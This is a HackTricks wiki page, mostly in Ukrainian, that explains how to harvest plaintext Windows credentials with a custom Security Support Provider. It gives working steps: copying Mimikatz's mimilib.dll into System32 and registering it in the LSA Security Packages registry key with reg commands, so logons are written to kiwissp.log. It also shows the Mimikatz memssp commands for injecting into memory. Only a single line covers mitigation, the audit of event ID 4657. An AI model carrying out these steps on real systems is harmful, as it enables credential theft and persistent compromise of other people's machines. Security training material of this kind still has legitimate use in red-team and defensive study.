# Custom SSP {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} ### Custom SSP [ДізнайтСся, Ρ‰ΠΎ Ρ‚Π°ΠΊΠ΅ SSP (Security Support Provider) Ρ‚ΡƒΡ‚.](../authentication-credentials-uac-and-efs/#security-support-provider-interface-sspi)\ Π’ΠΈ ΠΌΠΎΠΆΠ΅Ρ‚Π΅ створити **свій власний SSP**, Ρ‰ΠΎΠ± **Π·Π°Ρ…ΠΎΠΏΠΈΡ‚ΠΈ** Ρƒ **Π²Ρ–Π΄ΠΊΡ€ΠΈΡ‚ΠΎΠΌΡƒ тСксті** **ΠΎΠ±Π»Ρ–ΠΊΠΎΠ²Ρ– Π΄Π°Π½Ρ–**, які Π²ΠΈΠΊΠΎΡ€ΠΈΡΡ‚ΠΎΠ²ΡƒΡŽΡ‚ΡŒΡΡ для доступу Π΄ΠΎ машини. #### Mimilib Π’ΠΈ ΠΌΠΎΠΆΠ΅Ρ‚Π΅ використовувати Π±Ρ–Π½Π°Ρ€Π½ΠΈΠΉ Ρ„Π°ΠΉΠ» `mimilib.dll`, Π½Π°Π΄Π°Π½ΠΈΠΉ Mimikatz. **Π¦Π΅ Π±ΡƒΠ΄Π΅ записувати Ρƒ Ρ„Π°ΠΉΠ» всі ΠΎΠ±Π»Ρ–ΠΊΠΎΠ²Ρ– Π΄Π°Π½Ρ– Ρƒ Π²Ρ–Π΄ΠΊΡ€ΠΈΡ‚ΠΎΠΌΡƒ тСксті.**\ Π‘ΠΊΠΈΠ½ΡŒΡ‚Π΅ dll Ρƒ `C:\Windows\System32\`\ ΠžΡ‚Ρ€ΠΈΠΌΠ°ΠΉΡ‚Π΅ список Ρ–ΡΠ½ΡƒΡŽΡ‡ΠΈΡ… LSA Security Packages: {% code title="attacker@target" %} ```bash PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u ``` {% endcode %} Π”ΠΎΠ΄Π°ΠΉΡ‚Π΅ `mimilib.dll` Π΄ΠΎ списку ΠΏΠΎΡΡ‚Π°Ρ‡Π°Π»ΡŒΠ½ΠΈΠΊΡ–Π² ΠΏΡ–Π΄Ρ‚Ρ€ΠΈΠΌΠΊΠΈ Π±Π΅Π·ΠΏΠ΅ΠΊΠΈ (Security Packages): ```powershell reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" ``` Π† після пСрСзавантаТСння всі ΠΎΠ±Π»Ρ–ΠΊΠΎΠ²Ρ– Π΄Π°Π½Ρ– ΠΌΠΎΠΆΠ½Π° Π·Π½Π°ΠΉΡ‚ΠΈ Ρƒ Π²Ρ–Π΄ΠΊΡ€ΠΈΡ‚ΠΎΠΌΡƒ вигляді Π² `C:\Windows\System32\kiwissp.log` #### Π£ ΠΏΠ°ΠΌ'яті Π’ΠΈ Ρ‚Π°ΠΊΠΎΠΆ ΠΌΠΎΠΆΠ΅Ρ‚Π΅ Π±Π΅Π·ΠΏΠΎΡΠ΅Ρ€Π΅Π΄Π½ΡŒΠΎ Π²ΠΏΡ€ΠΎΠ²Π°Π΄ΠΈΡ‚ΠΈ Ρ†Π΅ Π² ΠΏΠ°ΠΌ'ΡΡ‚ΡŒ, Π²ΠΈΠΊΠΎΡ€ΠΈΡΡ‚ΠΎΠ²ΡƒΡŽΡ‡ΠΈ Mimikatz (Π·Π²Π΅Ρ€Π½Ρ–Ρ‚ΡŒ ΡƒΠ²Π°Π³Ρƒ, Ρ‰ΠΎ Ρ†Π΅ ΠΌΠΎΠΆΠ΅ Π±ΡƒΡ‚ΠΈ Ρ‚Ρ€ΠΎΡ…ΠΈ Π½Π΅ΡΡ‚Π°Π±Ρ–Π»ΡŒΠ½ΠΎ/Π½Π΅ ΠΏΡ€Π°Ρ†ΡŽΠ²Π°Ρ‚ΠΈ): ```powershell privilege::debug misc::memssp ``` Π¦Π΅ Π½Π΅ ΠΏΠ΅Ρ€Π΅ΠΆΠΈΠ²Π΅ пСрСзавантаТСння. #### Пом'якшСння ID ΠΏΠΎΠ΄Ρ–Ρ— 4657 - Аудит створСння/Π·ΠΌΡ–Π½ΠΈ `HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages` {% hint style="success" %} Π’ΠΈΠ²Ρ‡Π°ΠΉΡ‚Π΅ Ρ‚Π° ΠΏΡ€Π°ΠΊΡ‚ΠΈΠΊΡƒΠΉΡ‚Π΅ AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Π’ΠΈΠ²Ρ‡Π°ΠΉΡ‚Π΅ Ρ‚Π° ΠΏΡ€Π°ΠΊΡ‚ΠΈΠΊΡƒΠΉΡ‚Π΅ GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
ΠŸΡ–Π΄Ρ‚Ρ€ΠΈΠΌΠ°ΠΉΡ‚Π΅ HackTricks * ΠŸΠ΅Ρ€Π΅Π²Ρ–Ρ€Ρ‚Π΅ [**ΠΏΠ»Π°Π½ΠΈ підписки**](https://github.com/sponsors/carlospolop)! * **ΠŸΡ€ΠΈΡ”Π΄Π½ΡƒΠΉΡ‚Π΅ΡΡŒ Π΄ΠΎ** πŸ’¬ [**Π³Ρ€ΡƒΠΏΠΈ Discord**](https://discord.gg/hRep4RUj7f) Π°Π±ΠΎ [**Π³Ρ€ΡƒΠΏΠΈ Telegram**](https://t.me/peass) Π°Π±ΠΎ **слідкуйтС** Π·Π° Π½Π°ΠΌΠΈ Π² **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Π”Ρ–Π»Ρ–Ρ‚ΡŒΡΡ Ρ…Π°ΠΊΠ΅Ρ€ΡΡŒΠΊΠΈΠΌΠΈ Ρ‚Ρ€ΡŽΠΊΠ°ΠΌΠΈ, Π½Π°Π΄ΡΠΈΠ»Π°ΡŽΡ‡ΠΈ PR Π΄ΠΎ** [**HackTricks**](https://github.com/carlospolop/hacktricks) Ρ‚Π° [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Ρ€Π΅ΠΏΠΎΠ·ΠΈΡ‚ΠΎΡ€Ρ–Ρ—Π² Π½Π° GitHub.
{% endhint %}